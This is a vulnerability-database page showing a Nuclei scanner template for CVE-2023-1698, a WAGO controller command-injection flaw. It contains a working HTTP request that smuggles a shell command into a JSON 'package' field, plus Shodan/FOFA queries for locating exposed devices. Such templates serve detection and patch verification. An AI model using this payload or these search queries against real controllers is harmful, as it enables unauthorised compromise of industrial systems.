Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-1698HistoryJul 30, 2023 - 4:41 p.m.
WAGO - Remote Command Execution
2023-07-3016:41:33
ProjectDiscovery
github.com
19
cve2023
wago
rce
unauthenticated
dos
system compromise
security patches
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.3 High
AI Score
Confidence
High
0.882 High
EPSS
Percentile
98.7%
In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.
id: CVE-2023-1698
info:
name: WAGO - Remote Command Execution
author: xianke
severity: critical
description: |
In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
remediation: |
Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
reference:
- https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1698
- https://cert.vde.com/en/advisories/VDE-2023-007/
- https://github.com/codeb0ss/CVE-2023-1698-PoC
- https://github.com/deIndra/CVE-2023-1698
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1698
cwe-id: CWE-78
epss-score: 0.90792
epss-percentile: 0.98828
cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wago
product: compact_controller_100_firmware
shodan-query:
- html:"/wbm/" html:"wago"
- http.html:"/wbm/" html:"wago"
fofa-query: body="/wbm/" html:"wago"
tags: cve2023,cve,wago,rce
http:
- raw:
- |
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"package":";id;#"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"license":'
- '"name":'
- 'uid='
- 'gid='
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502203ae6e2609e538982731a77fbf019008a57b2265608410bec3b93b14da9f21331022100a9b5e770cc685099840f3ee0bde062597d9fd29da778c962f4ad38cf75bd6f14:922c64590222798bb761d5b6d8e72950Related
githubexploit
githubexploit
Exploit for OS Command Injection in Wago Compact Controller 100 Firmware
2023-10-20 12:15:39
Exploit for OS Command Injection in Wago Compact Controller 100 Firmware
2023-09-10 01:29:48
Exploit for OS Command Injection in Wago Compact Controller 100 Firmware
2023-09-15 20:06:31
nvd
nvd
CVE-2023-1698
2023-05-15 09:15:09
cvelist
cvelist
CVE-2023-1698 WAGO: WBM Command Injection in multiple products
2023-05-15 08:51:27
cve
cve
CVE-2023-1698
2023-05-15 09:15:09
prion
prion
Design/Logic Flaw
2023-05-15 09:15:00
nessus
nessus
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.3 High
AI Score
Confidence
High
0.882 High
EPSS
Percentile
98.7%
Related for NUCLEI:CVE-2023-1698